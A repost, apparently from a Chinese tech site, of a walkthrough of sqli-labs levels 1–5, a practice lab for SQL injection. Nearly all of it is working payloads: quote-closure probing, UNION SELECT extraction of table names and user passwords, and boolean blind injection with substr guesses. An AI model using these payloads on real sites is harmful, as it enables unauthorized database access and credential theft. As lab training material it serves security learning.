| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 大数据 -> sqli-labs 前五关 -> 正文阅读 |
|
[大数据]sqli-labs 前五关 |
less-1 输入?id=1 ,?id=1 and 1=1 ,?id=1 and 1=2 都显示正常 说明不是数字型注入 输入?id=1' 报错 输入 ?id=1' and '1'='1 显示正常,输入?id=1' and '1'='2 显示错误 说明存在字符型漏洞 输入?id=1' order by 1 --+ //判断字段 经过测试有三个字段 输入?id=-1' union select 1,2,3 --+ 判断回显位置 输入?id=-1' union select 1,2,database() --+ 获取当前数据库名 输入 ?id=-1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security' --+ 获取表名 输入?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'--+ 获取字段名 ? 输入?id=-1' union select 1,2,concat_ws(',',id,username,password)from security.users limit 0,1--+ 逐条获取数据 less-2 输入?id=1 正常显示 输入?id=1 and 1=1 正常显示 ? ? 输入?id=1 and1=2 不显示 证明存在数字型注入 输入?id=1 order by 1 判断字段数? 经验证为三个字段 输入?id=-1 union select 1,2,3 判断回显位置 输入 ?id=-1 union select 1,2,database()? 获取当前数据库名 输入?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security' 获取表名 ? ? ?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users' //获取字段名 ? ? ?id=-1 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1--+ ?逐条获取数据 ?less-3 输入?id=1 ,?id=1 and 1=1 ,?id=1 and 1=2 都显示正常 说明不是数字型注入 输入?id=1' , ?id=1' --+ 都报错,说明闭合符号不对 经过尝试发现闭合符号为') ?输入?id=1') order by 1--+ 判断字段数,结果为三 ?id=-1') union select 1,2,3--+ 判断回显位置 ?id=-1') union select 1,2,database()--+ 获取当前数据库名 ?id=-1') union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'--+ 获取表名 ? ??id=-1') union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'--+ 获取字段名 ?id=-1') union select 1,2,concat_ws(',',id,username,password)from security.users limit 0,1--+ 逐条获取全部数据 ?less-4 闭合符号为") ?id=1") order by 1 --+判断字段数 结果为3 ?id=-1") union select 1,2,3--+ 判断回显位置 ?id=-1") union select 1,2,database()--+ 获取数据库名 ?id=-1") union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'--+ 获取表名 ? ??id=-1") union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'--+ 获取字段名 ? ??id=-1") union select 1,2,concat_ws(',',id,username,password)from security.users limit 0,1--+ 逐条获取数据 ? ? ?less-5 ?这是一个闭合字符为 ' 的布尔型盲注 只能通过一个字母一个字母的猜测,从而达到想要的值 ?id=1' and length(database())=8--+ //猜测数据库名的长度 ?id=1' and substr(database(),1,1)='s'--+ // 逐个猜测数据库名的字母,对了返回you are in.. ?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e'--+ //逐个猜测数据库表的名字 ?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='users'? limit 0,1),1,1)='i'--+ //逐个字母猜测表 的字段名 ?id=1' and substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1)='a' --+//逐个字母 猜测数据的值 这需要有足够的耐心 ? ? ? ? |
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/24 11:45:23- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |